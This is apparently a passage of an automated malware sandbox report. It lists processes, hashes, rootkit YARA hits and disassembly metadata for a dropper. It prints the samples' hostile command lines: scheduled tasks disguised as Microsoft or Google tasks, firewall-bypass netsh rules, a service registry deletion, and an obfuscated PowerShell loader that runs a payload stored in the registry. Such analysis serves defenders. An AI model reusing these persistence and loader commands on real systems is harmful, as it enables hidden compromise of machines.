File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	33
Start time:	16:48:02
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Imagebase:	0x1000000
File size:	6436352 bytes
MD5 hash:	AAEAD1169523638D40CA4D884E3D787A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	34
Start time:	16:48:01
Start date:	04/01/2023
Path:	C:\Windows\GoogleUpdate.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\GoogleUpdate.exe
Imagebase:	0xf80000
File size:	154456 bytes
MD5 hash:	9A66A3DE2589F7108426AF37AB7F6B41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs

Show Windows behavior

Target ID:	35
Start time:	16:48:02
Start date:	04/01/2023
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff751a80000
File size:	72704 bytes
MD5 hash:	E3DACF0B31841FA02064B4457D44B357
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	37
Start time:	16:48:02
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	38
Start time:	16:48:03
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe"
Imagebase:	0xac0000
File size:	28672 bytes
MD5 hash:	68E3359674EE7D49550B09E7FF69DCCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000026.00000002.626071532.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000026.00000002.627158411.0000000001010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 85%, ReversingLabs

Show Windows behavior

Target ID:	39
Start time:	16:48:04
Start date:	04/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	40
Start time:	16:48:05
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	41
Start time:	16:48:05
Start date:	04/01/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff61e220000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	42
Start time:	16:48:08
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\MfU3390p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\LocalLow\MfU3390p.exe"
Imagebase:	0xf20000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM, Description: Detects executables embedding command execution via IExecuteCommand COM object, Source: C:\Users\user\AppData\LocalLow\MfU3390p.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 80%, ReversingLabs

Show Windows behavior

Target ID:	43
Start time:	16:48:08
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram "C:\Windows\GoogleUpdate.exe" "Google Updater" ENABLE ALL
Imagebase:	0x8c0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	44
Start time:	16:48:09
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe70000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	45
Start time:	16:48:09
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	46
Start time:	16:48:09
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="Google Updater" dir=in action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Imagebase:	0x8c0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	47
Start time:	16:48:09
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	48
Start time:	16:48:09
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh advfirewall firewall add rule name="Google Updater" dir=out action=allow program="C:\Windows\GoogleUpdate.exe" enable=yes
Imagebase:	0x8c0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	49
Start time:	16:48:10
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	50
Start time:	16:48:13
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	51
Start time:	16:48:18
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
Imagebase:	0x1000000
File size:	6436352 bytes
MD5 hash:	AAEAD1169523638D40CA4D884E3D787A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	52
Start time:	16:48:24
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\MfU3390p.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\LocalLow\MfU3390p.exe
Imagebase:	0xf20000
File size:	88064 bytes
MD5 hash:	33DAD992607D0FFD44D2C81FE67F8FB1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	53
Start time:	16:48:24
Start date:	04/01/2023
Path:	C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe
Imagebase:	0x9a0000
File size:	28672 bytes
MD5 hash:	68E3359674EE7D49550B09E7FF69DCCE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	54
Start time:	16:48:26
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	SCHTASKS /Create /TR "C:\Users\user\AppData\LocalLow\MfU3390p.exe" /TN "MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca}" /SC ONLOGON /F /RL HIGHEST
Imagebase:	0xe70000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	55
Start time:	16:48:26
Start date:	04/01/2023
Path:	C:\Windows\System32\dialer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dialer.exe
Imagebase:	0x7ff74a3e0000
File size:	36864 bytes
MD5 hash:	0EC74656A7F7667DD94C76081B111827
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	56
Start time:	16:48:28
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	57
Start time:	16:48:34
Start date:	04/01/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"cmd.exe" /C schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff632260000
File size:	273920 bytes
MD5 hash:	4E2ACF4F8A396486AB4268C94A6A245F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Analysis Process: powershell.exePID: 1716, Parent PID: 3064

General

Target ID:	58
Start time:	16:48:35
Start date:	04/01/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
Imagebase:	0x7ff730180000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	59
Start time:	16:48:35
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	60
Start time:	16:48:35
Start date:	04/01/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0x11b0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	61
Start time:	16:48:36
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	62
Start time:	16:48:36
Start date:	04/01/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Imagebase:	0x7ff730180000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Target ID:	63
Start time:	16:48:36
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	64
Start time:	16:48:53
Start date:	04/01/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
Imagebase:	0x7ff7cecd0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	65
Start time:	16:48:58
Start date:	04/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	67
Start time:	16:49:01
Start date:	04/01/2023
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks /create /tn \MicrosoftPlatformRenderer{37379bc5-bb9c-4fca-aa31-e33b4e087725} /tr "C:\Users\user\AppData\LocalLow\NtjHIfvQ.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
Imagebase:	0x7ff7cecd0000
File size:	226816 bytes
MD5 hash:	838D346D1D28F00783B7A6C6BD03A0DA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	69
Start time:	16:49:06
Start date:	04/01/2023
Path:	C:\Windows\System32\audiodg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AUDIODG.EXE 0x424
Imagebase:	0x7ff6fc6d0000
File size:	594128 bytes
MD5 hash:	0B245353F92DF527AA7613BA2C0DA023
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000045.00000002.647679469.000001E0E6C60000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000045.00000002.646633753.000001E0E69F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Target ID:	70
Start time:	16:49:21
Start date:	04/01/2023
Path:	C:\Windows\System32\dllhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\System32\dllhost.exe /Processid:{946476e5-3894-42c2-b536-7341f926cc1f}
Imagebase:
File size:	20888 bytes
MD5 hash:	2528137C6745C4EADD87817A1909677E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000046.00000002.623052699.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000046.00000002.630153308.0000023BED1B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Rootkit_R77_5bab748b, Description: unknown, Source: 00000046.00000002.628757594.0000023BED180000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

Show Windows behavior

Function 00A58D20 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

"q, xrefs: 00A5AC7E

Memory Dump Source

Source File: 00000000.00000002.456522468.0000000000A34000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.431170645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.431179775.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.432046165.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.435268078.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.437845798.000000000041E000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.442694119.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.442833213.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.443271915.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.443613943.0000000000449000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462437950.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462730682.0000000000D4D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.463275572.0000000000D8D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Installer.jbxd

Similarity

API ID:
String ID: "q
API String ID: 0-3244889461
Opcode ID: eb0040c77ec5027acc3b10e25f0ccb9167d415d7f26babb16889dd106ccd2dbe
Instruction ID: bdde87e39d9e88a5e57e29d1bf6639c39e3699451ab3e6da27eca7c519cbb267
Opcode Fuzzy Hash: eb0040c77ec5027acc3b10e25f0ccb9167d415d7f26babb16889dd106ccd2dbe
Instruction Fuzzy Hash: 9641FB7AA0630397D7446B35CD562FB77A2EFD1751F29C52CEA8903184E7348845C742

Uniqueness

Uniqueness Score: -1.00%

Function 00A34F7C Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.456522468.0000000000A34000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.431170645.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.431179775.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.432046165.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.435268078.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.437845798.000000000041E000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.442694119.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.442833213.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.443271915.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.443613943.0000000000449000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462437950.0000000000D29000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.462730682.0000000000D4D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.463275572.0000000000D8D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad4e0bb911e7b42dab321dd8b6df6971bb682f9167b879b285482ea18ef8d9a0
Instruction ID: ecb67d9530a2f1188309b5b7da787ba6e535314305c833562d2b1db8597c102a
Opcode Fuzzy Hash: ad4e0bb911e7b42dab321dd8b6df6971bb682f9167b879b285482ea18ef8d9a0
Instruction Fuzzy Hash: 9611CE6F60932CDBE311A5678D407E275DF9388B00F035318F50DA72C0EBA21A4A86D4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1u8JL0XE.exePID: 3064, Parent PID: 2980COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.7%
Total number of Nodes:	1484
Total number of Limit Nodes:	15

Executed Functions

Function 00007FF738D91770 Relevance: 21.9, APIs: 11, Strings: 1, Instructions: 890
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount64.KERNEL32 ref: 00007FF738D91799
GetTickCount64.KERNEL32 ref: 00007FF738D917AA

Strings

yAA, xrefs: 00007FF738D91EB1

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: Count64Tick
String ID: yAA
API String ID: 1927824332-3548342407
Opcode ID: ac53714ac9c9c008475aefa79665ce0498f11f982f958a488c8d31590c53d87b
Instruction ID: fe80c89b9cbf4bc51aff28f23d028d521dcd1ca69dd7d3641504c79adc87598e
Opcode Fuzzy Hash: ac53714ac9c9c008475aefa79665ce0498f11f982f958a488c8d31590c53d87b
Instruction Fuzzy Hash: 35920823A287C2A1FB11AB24E4157FAE7A1FB89784F845131CA8C07795EF7ED148D324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D93170 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 423
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_stricmp.MSVCRT ref: 00007FF738D93384
strcmp.MSVCRT ref: 00007FF738D9358E
strcmp.MSVCRT ref: 00007FF738D93640
strcmp.MSVCRT ref: 00007FF738D936E7
strcmp.MSVCRT ref: 00007FF738D93797
strcmp.MSVCRT ref: 00007FF738D9383A
strcmp.MSVCRT ref: 00007FF738D938BA

Strings

y, xrefs: 00007FF738D934E9
KF , xrefs: 00007FF738D9385B
}, xrefs: 00007FF738D936FC

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514484942.00007FF738DC3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.514574128.00007FF738DC5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530729498.00007FF739041000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530764142.00007FF739043000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.530900326.00007FF739049000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531215716.00007FF739051000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531316268.00007FF739053000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531339515.00007FF739056000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.531354944.00007FF739057000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff738d90000_1u8JL0XE.jbxd

Similarity

API ID: strcmp$_stricmp
String ID: KF $y$}
API String ID: 3398372305-1747734038
Opcode ID: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction ID: 9c5ab852b9285107d66171ffaf9620e136a7b8c8c0c4fc549b73ac16d752679c
Opcode Fuzzy Hash: 2ee6c4bc9c73bbe018eb2e9c596121fa35c4079898e358f7aeca13623c809fb1
Instruction Fuzzy Hash: 9A22F422A187C2A5EB21EF29E4053AAF7A0FF99784F849131DA8C07B55DF7DD048D724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF738D91190 Relevance: 10.7, APIs: 7, Instructions: 201
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF738D911F6
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF738D91268
malloc.MSVCRT ref: 00007FF738D9133C
malloc.MSVCRT ref: 00007FF738D91384
memcpy.MSVCRT ref: 00007FF738D9139C
GetStartupInfoW.KERNEL32 ref: 00007FF738D9148E

Memory Dump Source

Source File: 00000001.00000002.513671692.00007FF738D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738D90000, based on PE: true

Associated: 00000001.00000002.513653452.00007FF738D90000.00000002.00000001.01000000.00000009.sdmpDownload File
